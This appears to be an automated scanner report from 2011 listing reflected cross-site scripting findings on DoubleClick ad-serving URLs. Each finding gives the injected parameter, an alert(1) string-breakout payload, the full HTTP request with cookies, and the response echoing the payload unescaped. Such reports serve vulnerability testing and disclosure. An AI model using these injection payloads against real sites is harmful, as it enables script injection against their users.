The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba557"-alert(1)-"eed0cbd30d3 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=ba557"-alert(1)-"eed0cbd30d3 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4918 Cache-Control: no-cache Pragma: no-cache Date: Tue, 22 Mar 2011 22:04:50 GMT Expires: Tue, 22 Mar 2011 22:04:50 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... NvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=ba557"-alert(1)-"eed0cbd30d3http://www.dishnetwork.com/redirects/promotion/offer22/default.aspx?utm_source=google&utm_medium=display&utm_campaign=testbooyah"); var wmode = "opaque"; var bg = "ffffff"; var dcallowscriptaccess = "n ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f071f"-alert(1)-"586c30ab82d was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAAf071f"-alert(1)-"586c30ab82d&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:04:13 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:04:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4954
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80627"-alert(1)-"c043f3127fe was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-783211283734559080627"-alert(1)-"c043f3127fe&adurl=;ord=1050800391? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:04:48 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:04:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4954
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... udG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-783211283734559080627"-alert(1)-"c043f3127fe&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah"); var wmode = "opaque"; var bg = "ffffff"; var ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46e2d"-alert(1)-"e00ed999199 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=146e2d"-alert(1)-"e00ed999199&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:04:28 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:04:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4954
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2756b"-alert(1)-"b6a0b2aa765 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg2756b"-alert(1)-"b6a0b2aa765&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:04:38 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:04:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4954
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg2756b"-alert(1)-"b6a0b2aa765&client=ca-pub-7832112837345590&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah"); var wmode = " ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48c1c"-alert(1)-"6255ab16084 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l48c1c"-alert(1)-"6255ab16084&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:03:58 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:03:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4954
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/f/17c/%2a/e%3B238208793%3B0-0%3B0%3B61271527%3B3454-728/90%3B41152703/41170490/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l48c1c"-alert(1)-"6255ab16084&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18602"-alert(1)-"78977e6fbdc was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=18602"-alert(1)-"78977e6fbdc HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6880 Cache-Control: no-cache Pragma: no-cache Date: Tue, 22 Mar 2011 22:06:27 GMT Expires: Tue, 22 Mar 2011 22:06:27 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=18602"-alert(1)-"78977e6fbdchttp://learning.capella.edu/banners.aspx?revkey=151263"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec400"-alert(1)-"326249badcd was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACEec400"-alert(1)-"326249badcd&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:05:53 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:05:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6910
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... JTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACEec400"-alert(1)-"326249badcd&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263"); var fscUrl = url; var fscUrlClickTagFound = fals ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd738"-alert(1)-"12e78c94558 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590fd738"-alert(1)-"12e78c94558&adurl=;ord=689417439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:06:24 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:06:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6910
